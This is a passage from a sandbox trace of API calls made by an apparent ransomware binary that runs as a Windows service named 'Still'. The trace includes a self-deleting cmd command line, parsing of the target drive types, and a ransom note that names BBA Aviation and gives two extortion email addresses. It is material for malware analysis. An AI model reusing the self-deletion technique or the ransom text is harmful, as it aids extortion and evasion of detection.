TokenInformation=0x0, ReturnLength=0x19ff24) returned 0 [0155.807] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x6839d8 [0155.807] GetTokenInformation (in: TokenHandle=0x20c, TokenInformationClass=0x19, TokenInformation=0x6839d8, TokenInformationLength=0x14, ReturnLength=0x19ff24 | out: TokenInformation=0x6839d8, ReturnLength=0x19ff24) returned 1 [0155.807] GetSidSubAuthorityCount (pSid=0x6839e0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x4000)) returned 0x6839e1 [0155.807] GetSidSubAuthority (pSid=0x6839e0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x4000), nSubAuthority=0x0) returned 0x6839e8 [0155.807] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6839d8 | out: hHeap=0x660000) returned 1 [0155.807] CloseHandle (hObject=0x20c) returned 1 [0155.807] lstrlenW (lpString="-s") returned 2 [0155.807] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x6) returned 0x682200 [0155.807] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x682210 [0155.807] lstrlenW (lpString="-s") returned 2 [0155.807] StartServiceCtrlDispatcherW (lpServiceTable=0x19ff34*(lpServiceName="Still", lpServiceProc=0x4034bf)) [0157.077] SetEvent (hEvent=0x238) returned 1 [0241.856] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x674720 | out: hHeap=0x660000) returned 1 [0241.856] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x674960 | out: hHeap=0x660000) returned 1 [0241.856] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x674740 | out: hHeap=0x660000) returned 1 [0241.856] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x674d40 | out: hHeap=0x660000) returned 1 [0241.856] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x674b20 | out: hHeap=0x660000) returned 1 [0241.856] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x674b40 | out: hHeap=0x660000) returned 1 [0241.856] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x674b60 | out: hHeap=0x660000) returned 1 [0241.856] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x683338 | out: hHeap=0x660000) returned 1 [0241.856] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6835b8 | out: hHeap=0x660000) returned 1 [0241.856] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6834d8 | out: hHeap=0x660000) returned 1 [0241.856] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x674860 | out: hHeap=0x660000) returned 1 [0241.856] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x674900 | out: hHeap=0x660000) returned 1 [0241.856] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x674660 | out: hHeap=0x660000) returned 1 [0241.857] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x674760 | out: hHeap=0x660000) returned 1 [0241.857] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6747a0 | out: hHeap=0x660000) returned 1 [0241.857] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x674ba0 | out: hHeap=0x660000) returned 1 [0241.857] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x674aa0 | out: hHeap=0x660000) returned 1 [0241.857] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x674ca0 | out: hHeap=0x660000) returned 1 [0241.857] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x674a20 | out: hHeap=0x660000) returned 1 [0241.857] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x674c80 | out: hHeap=0x660000) returned 1 [0241.857] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6749e0 | out: hHeap=0x660000) returned 1 [0241.857] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x674a80 | out: hHeap=0x660000) returned 1 [0241.857] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x674ce0 | out: hHeap=0x660000) returned 1 [0241.857] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x674d20 | out: hHeap=0x660000) returned 1 [0241.857] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x683398 | out: hHeap=0x660000) returned 1 [0241.857] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6834b8 | out: hHeap=0x660000) returned 1 [0241.857] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x683318 | out: hHeap=0x660000) returned 1 [0241.857] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x683298 | out: hHeap=0x660000) returned 1 [0241.857] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x683598 | out: hHeap=0x660000) returned 1 [0241.857] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x683358 | out: hHeap=0x660000) returned 1 [0241.857] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x683378 | out: hHeap=0x660000) returned 1 [0241.857] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6832b8 | out: hHeap=0x660000) returned 1 [0241.857] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x683418 | out: hHeap=0x660000) returned 1 [0241.857] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x683458 | out: hHeap=0x660000) returned 1 [0241.857] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x683618 | out: hHeap=0x660000) returned 1 [0241.857] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x683638 | out: hHeap=0x660000) returned 1 [0241.857] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6748e0 | out: hHeap=0x660000) returned 1 [0241.857] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6746c0 | out: hHeap=0x660000) returned 1 [0241.857] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6749a0 | out: hHeap=0x660000) returned 1 [0241.857] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6749c0 | out: hHeap=0x660000) returned 1 [0241.857] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x674c60 | out: hHeap=0x660000) returned 1 [0241.857] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x674b00 | out: hHeap=0x660000) returned 1 [0241.857] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x674bc0 | out: hHeap=0x660000) returned 1 [0241.857] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x674a40 | out: hHeap=0x660000) returned 1 [0241.857] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x674ae0 | out: hHeap=0x660000) returned 1 [0241.857] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x674d00 | out: hHeap=0x660000) returned 1 [0241.857] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x674c00 | out: hHeap=0x660000) returned 1 [0241.858] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x674c20 | out: hHeap=0x660000) returned 1 [0241.858] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x66a540 | out: hHeap=0x660000) returned 1 [0241.858] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x683478 | out: hHeap=0x660000) returned 1 [0241.858] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6832f8 | out: hHeap=0x660000) returned 1 [0241.858] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x683498 | out: hHeap=0x660000) returned 1 [0241.858] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x683278 | out: hHeap=0x660000) returned 1 [0241.858] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6832d8 | out: hHeap=0x660000) returned 1 [0241.858] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x683558 | out: hHeap=0x660000) returned 1 [0241.858] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6833b8 | out: hHeap=0x660000) returned 1 [0241.858] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6833f8 | out: hHeap=0x660000) returned 1 [0241.858] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6834f8 | out: hHeap=0x660000) returned 1 [0241.858] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x683438 | out: hHeap=0x660000) returned 1 [0241.858] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x683538 | out: hHeap=0x660000) returned 1 [0241.858] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x683578 | out: hHeap=0x660000) returned 1 [0241.858] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x683258 | out: hHeap=0x660000) returned 1 [0241.858] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6839b8 | out: hHeap=0x660000) returned 1 [0241.858] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6839f8 | out: hHeap=0x660000) returned 1 [0241.858] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x674980 | out: hHeap=0x660000) returned 1 [0241.858] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x674780 | out: hHeap=0x660000) returned 1 [0241.858] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6747c0 | out: hHeap=0x660000) returned 1 [0241.858] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x674640 | out: hHeap=0x660000) returned 1 [0241.858] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x674820 | out: hHeap=0x660000) returned 1 [0241.858] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x674c40 | out: hHeap=0x660000) returned 1 [0241.858] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x674d80 | out: hHeap=0x660000) returned 1 [0241.858] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x674a00 | out: hHeap=0x660000) returned 1 [0241.858] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x674a60 | out: hHeap=0x660000) returned 1 [0241.858] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x674cc0 | out: hHeap=0x660000) returned 1 [0241.858] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x674ac0 | out: hHeap=0x660000) returned 1 [0241.858] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x674b80 | out: hHeap=0x660000) returned 1 [0241.858] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x674d60 | out: hHeap=0x660000) returned 1 [0241.858] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x674be0 | out: hHeap=0x660000) returned 1 [0241.858] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6835f8 | out: hHeap=0x660000) returned 1 [0241.858] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6833d8 | out: hHeap=0x660000) returned 1 [0241.858] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6835d8 | out: hHeap=0x660000) returned 1 [0241.859] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x683518 | out: hHeap=0x660000) returned 1 [0241.859] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x683090 | out: hHeap=0x660000) returned 1 [0241.859] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6831d0 | out: hHeap=0x660000) returned 1 [0241.859] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6831a8 | out: hHeap=0x660000) returned 1 [0241.859] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x682ff0 | out: hHeap=0x660000) returned 1 [0241.859] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x683130 | out: hHeap=0x660000) returned 1 [0241.859] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x682fa0 | out: hHeap=0x660000) returned 1 [0241.859] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x682d98 | out: hHeap=0x660000) returned 1 [0241.859] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x682c80 | out: hHeap=0x660000) returned 1 [0241.859] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x682af0 | out: hHeap=0x660000) returned 1 [0241.859] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x682ed8 | out: hHeap=0x660000) returned 1 [0241.859] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x682cf8 | out: hHeap=0x660000) returned 1 [0241.859] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x682a50 | out: hHeap=0x660000) returned 1 [0241.859] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x682be0 | out: hHeap=0x660000) returned 1 [0241.859] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x682d48 | out: hHeap=0x660000) returned 1 [0241.859] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x682d70 | out: hHeap=0x660000) returned 1 [0241.859] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x683c68 | out: hHeap=0x660000) returned 1 [0241.859] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x683bc8 | out: hHeap=0x660000) returned 1 [0241.859] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x683f10 | out: hHeap=0x660000) returned 1 [0241.859] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x683c18 | out: hHeap=0x660000) returned 1 [0241.859] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6830b8 | out: hHeap=0x660000) returned 1 [0241.859] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x682f50 | out: hHeap=0x660000) returned 1 [0241.859] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6831f8 | out: hHeap=0x660000) returned 1 [0241.859] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x683108 | out: hHeap=0x660000) returned 1 [0241.859] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x682f78 | out: hHeap=0x660000) returned 1 [0241.859] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x682a78 | out: hHeap=0x660000) returned 1 [0241.859] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x682e60 | out: hHeap=0x660000) returned 1 [0241.859] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x682eb0 | out: hHeap=0x660000) returned 1 [0241.859] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x682e10 | out: hHeap=0x660000) returned 1 [0241.859] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x682f28 | out: hHeap=0x660000) returned 1 [0241.859] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x682ac8 | out: hHeap=0x660000) returned 1 [0241.859] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x682b40 | out: hHeap=0x660000) returned 1 [0241.859] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x682de8 | out: hHeap=0x660000) returned 1 [0241.859] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x682c08 | out: hHeap=0x660000) returned 1 [0241.859] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x682cd0 | out: hHeap=0x660000) returned 1 [0241.860] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x682d20 | out: hHeap=0x660000) returned 1 [0241.860] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x682e38 | out: hHeap=0x660000) returned 1 [0241.860] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x683d30 | out: hHeap=0x660000) returned 1 [0241.860] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x683ab0 | out: hHeap=0x660000) returned 1 [0241.860] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x683b78 | out: hHeap=0x660000) returned 1 [0241.860] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x683068 | out: hHeap=0x660000) returned 1 [0241.860] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x682fc8 | out: hHeap=0x660000) returned 1 [0241.860] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6830e0 | out: hHeap=0x660000) returned 1 [0241.860] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x683180 | out: hHeap=0x660000) returned 1 [0241.860] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x682e88 | out: hHeap=0x660000) returned 1 [0241.860] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x682b90 | out: hHeap=0x660000) returned 1 [0241.860] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x682b68 | out: hHeap=0x660000) returned 1 [0241.860] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x682dc0 | out: hHeap=0x660000) returned 1 [0241.860] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x682bb8 | out: hHeap=0x660000) returned 1 [0241.860] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x682b18 | out: hHeap=0x660000) returned 1 [0241.860] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x682ca8 | out: hHeap=0x660000) returned 1 [0241.860] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x683dd0 | out: hHeap=0x660000) returned 1 [0241.860] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x683d58 | out: hHeap=0x660000) returned 1 [0241.860] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x683df8 | out: hHeap=0x660000) returned 1 [0241.860] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x683c90 | out: hHeap=0x660000) returned 1 [0241.860] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x66abc0 | out: hHeap=0x660000) returned 1 [0241.860] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x683018 | out: hHeap=0x660000) returned 1 [0241.860] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x683040 | out: hHeap=0x660000) returned 1 [0241.860] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x683158 | out: hHeap=0x660000) returned 1 [0241.860] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x682aa0 | out: hHeap=0x660000) returned 1 [0241.860] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x682c58 | out: hHeap=0x660000) returned 1 [0241.860] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x682f00 | out: hHeap=0x660000) returned 1 [0241.860] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x682c30 | out: hHeap=0x660000) returned 1 [0241.861] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x683a60 | out: hHeap=0x660000) returned 1 [0241.861] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x683bf0 | out: hHeap=0x660000) returned 1 [0241.861] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x683e98 | out: hHeap=0x660000) returned 1 [0241.861] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x683ba0 | out: hHeap=0x660000) returned 1 [0241.861] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x675ee0 | out: hHeap=0x660000) returned 1 [0241.861] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x675e80 | out: hHeap=0x660000) returned 1 [0241.861] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x675eb0 | out: hHeap=0x660000) returned 1 [0241.861] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x675ca0 | out: hHeap=0x660000) returned 1 [0241.861] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x675f10 | out: hHeap=0x660000) returned 1 [0241.861] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x675fa0 | out: hHeap=0x660000) returned 1 [0241.861] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x675fd0 | out: hHeap=0x660000) returned 1 [0241.861] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x675c70 | out: hHeap=0x660000) returned 1 [0241.861] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x675d60 | out: hHeap=0x660000) returned 1 [0241.861] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x675d30 | out: hHeap=0x660000) returned 1 [0241.861] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x675cd0 | out: hHeap=0x660000) returned 1 [0241.861] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x676000 | out: hHeap=0x660000) returned 1 [0241.861] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x675e20 | out: hHeap=0x660000) returned 1 [0241.861] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x675df0 | out: hHeap=0x660000) returned 1 [0241.861] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x675d00 | out: hHeap=0x660000) returned 1 [0241.861] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x675dc0 | out: hHeap=0x660000) returned 1 [0241.861] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x675f70 | out: hHeap=0x660000) returned 1 [0241.861] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x677c70 | out: hHeap=0x660000) returned 1 [0241.862] lstrlenW (lpString="C:\\WINDOWS\\SysWOW64\\Still.exe") returned 29 [0241.862] lstrcmpW (lpString1=".exe", lpString2=":bin") returned -1 [0241.862] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xde) returned 0x6ba280 [0241.862] _snwprintf (in: _Dest=0x6ba280, _Count=0x6f, _Format="cmd /c choice /t %u /d y & attrib -h \"%s\" & del \"%s\"" | out: _Dest="cmd /c choice /t 10 /d y & attrib -h \"C:\\WINDOWS\\SysWOW64\\Still.exe\" & del \"C:\\WINDOWS\\SysWOW64\\Still.exe\"") returned 106 [0241.862] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="cmd /c choice /t 10 /d y & attrib -h \"C:\\WINDOWS\\SysWOW64\\Still.exe\" & del \"C:\\WINDOWS\\SysWOW64\\Still.exe\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x19fef0*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x19ff34 | out: lpCommandLine="cmd /c choice /t 10 /d y & attrib -h \"C:\\WINDOWS\\SysWOW64\\Still.exe\" & del \"C:\\WINDOWS\\SysWOW64\\Still.exe\"", lpProcessInformation=0x19ff34*(hProcess=0x240, hThread=0x21c, dwProcessId=0x13c4, dwThreadId=0x13d0)) returned 1 [0243.199] CloseHandle (hObject=0x21c) returned 1 [0243.199] CloseHandle (hObject=0x240) returned 1 [0243.199] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ba280 | out: hHeap=0x660000) returned 1 [0243.200] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x0) returned 0x401af6 [0243.200] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0xffffffff [0243.200] CloseHandle (hObject=0x208) returned 1 [0243.202] DeleteFileW (lpFileName="C:\\WINDOWS\\TEMP\\Still.dmp" (normalized: "c:\\windows\\temp\\still.dmp")) returned 1 [0243.203] ExitProcess (uExitCode=0x0) Thread: id = 495 os_tid = 0xf64 Thread: id = 508 os_tid = 0x55c [0155.848] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x238 [0155.848] RegisterServiceCtrlHandlerW (lpServiceName="Still", lpHandlerProc=0x405505) returned 0x683b28 [0155.848] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x405e2a, lpParameter=0x40a5d4, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x23c [0155.849] SetServiceStatus (hServiceStatus=0x683b28, lpServiceStatus=0x11fff3c*(dwServiceType=0x30, dwCurrentState=0x4, dwControlsAccepted=0x5, dwWin32ExitCode=0x0, dwServiceSpecificExitCode=0x0, dwCheckPoint=0x0, dwWaitHint=0x0)) returned 1 [0155.849] WaitForMultipleObjects (nCount=0x2, lpHandles=0x11fff58*=0x238, bWaitAll=1, dwMilliseconds=0xffffffff) [0241.533] SetServiceStatus (hServiceStatus=0x683b28, lpServiceStatus=0x11fff3c*(dwServiceType=0x30, dwCurrentState=0x3, dwControlsAccepted=0x5, dwWin32ExitCode=0x0, dwServiceSpecificExitCode=0x0, dwCheckPoint=0x0, dwWaitHint=0x0)) returned 1 [0241.534] CloseHandle (hObject=0x23c) returned 1 [0241.534] SetServiceStatus (hServiceStatus=0x683b28, lpServiceStatus=0x11fff3c*(dwServiceType=0x30, dwCurrentState=0x1, dwControlsAccepted=0x5, dwWin32ExitCode=0x0, dwServiceSpecificExitCode=0x0, dwCheckPoint=0x0, dwWaitHint=0x0)) returned 1 [0241.538] CloseHandle (hObject=0x238) returned 1 Thread: id = 509 os_tid = 0xda4 [0155.876] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x16) returned 0x683998 [0155.877] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x683e48 [0155.877] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x36) returned 0x677cf0 [0155.877] _wcslwr (in: _String=0x677cf0 | out: _String="movable|fixed|remote|share") returned="movable|fixed|remote|share" [0155.877] StrChrW (lpStart="movable|fixed|remote|share", wMatch=0x7c) returned="|fixed|remote|share" [0155.877] StrChrW (lpStart="fixed|remote|share", wMatch=0x7c) returned="|remote|share" [0155.877] StrChrW (lpStart="remote|share", wMatch=0x7c) returned="|share" [0155.877] StrChrW (lpStart="share", wMatch=0x7c) returned 0x0 [0155.877] lstrlenW (lpString="share") returned 5 [0155.878] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x677cf0 | out: hHeap=0x660000) returned 1 [0155.878] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x6822b0 [0155.878] StrToIntExW (in: pszString="128", dwFlags=0x0, piRet=0x12fff54 | out: piRet=0x12fff54) returned 1 [0155.878] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6822b0 | out: hHeap=0x660000) returned 1 [0155.878] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x6) returned 0x6822b0 [0155.878] StrToIntExW (in: pszString="20", dwFlags=0x0, piRet=0x12fff58 | out: piRet=0x12fff58) returned 1 [0155.878] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6822b0 | out: hHeap=0x660000) returned 1 [0155.878] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x406) returned 0x6898b0 [0155.878] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11a) returned 0x689cc0 [0155.878] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x2c) returned 0x66d608 [0155.878] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x689cc0, cbMultiByte=282, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 282 [0155.878] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x236) returned 0x689de8 [0155.948] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x689cc0, cbMultiByte=282, lpWideCharStr=0x689de8, cchWideChar=282 | out: lpWideCharStr="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]*[end_key]\r\nKEEP IT\r\n") returned 282 [0155.948] lstrlenW (lpString="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO 